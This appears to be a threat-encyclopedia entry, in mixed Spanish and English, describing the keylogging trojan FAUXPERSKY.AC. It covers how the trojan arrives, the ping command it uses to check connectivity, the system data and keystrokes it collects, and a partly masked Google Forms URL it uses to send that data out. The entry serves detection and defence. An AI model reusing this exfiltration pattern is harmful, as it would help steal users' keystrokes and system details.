TrojanSpy.Win64.FAUXPERSKY.AC

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Elimina archivos para impedir la ejecución correcta de programas y aplicaciones.

Se conecta a determinados sitios Web para enviar y recibir información.

Detalles de entrada

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Instalación

Agrega los procesos siguientes:

• %System%\cmd.exe /c ping -n 1 -w 1000 www.google.com.my>Ping.sb → checks internet connection

Otras modificaciones del sistema

Elimina los archivos siguientes:

• {Malware File Path}\Log.txt → to clear contents for new data

Robo de información

Recopila los siguientes datos:

• OS Version
• Computer Name
• User Name
• IP Address
• Content:
  • Keylogging information stored in Log.txt

Otros detalles

Se conecta al sitio Web siguiente para enviar y recibir información:

• https://{BLOCKED}s.{BLOCKED}e.com/forms/d/e/1FAIpQLSe6oGStKSshScVonAyCVFOrhANSfnmm0Im-aabnBX5ZjLabbA/viewform?entry.930994914=%A_OSVersion%&entry.210885477=%A_ComputerName%&entry.429054695=%A_UserName%&entry.1539630660=%A_IPAddress1%

Requiere la existencia de los archivos siguientes para ejecutarse correctamente:

• {Malware File Path}\Log.txt → dropped by svhost.exe detected as TrojanSpy.Win64.FAUXPERSKY.AB

Hace lo siguiente:

• It reads the contents of Log.txt.
• It checks the contents of Ping.sb if it contains the string "could not find."
  • If found, it repeatedly checks for internet connection.
• It exfiltrates information via Google Forms.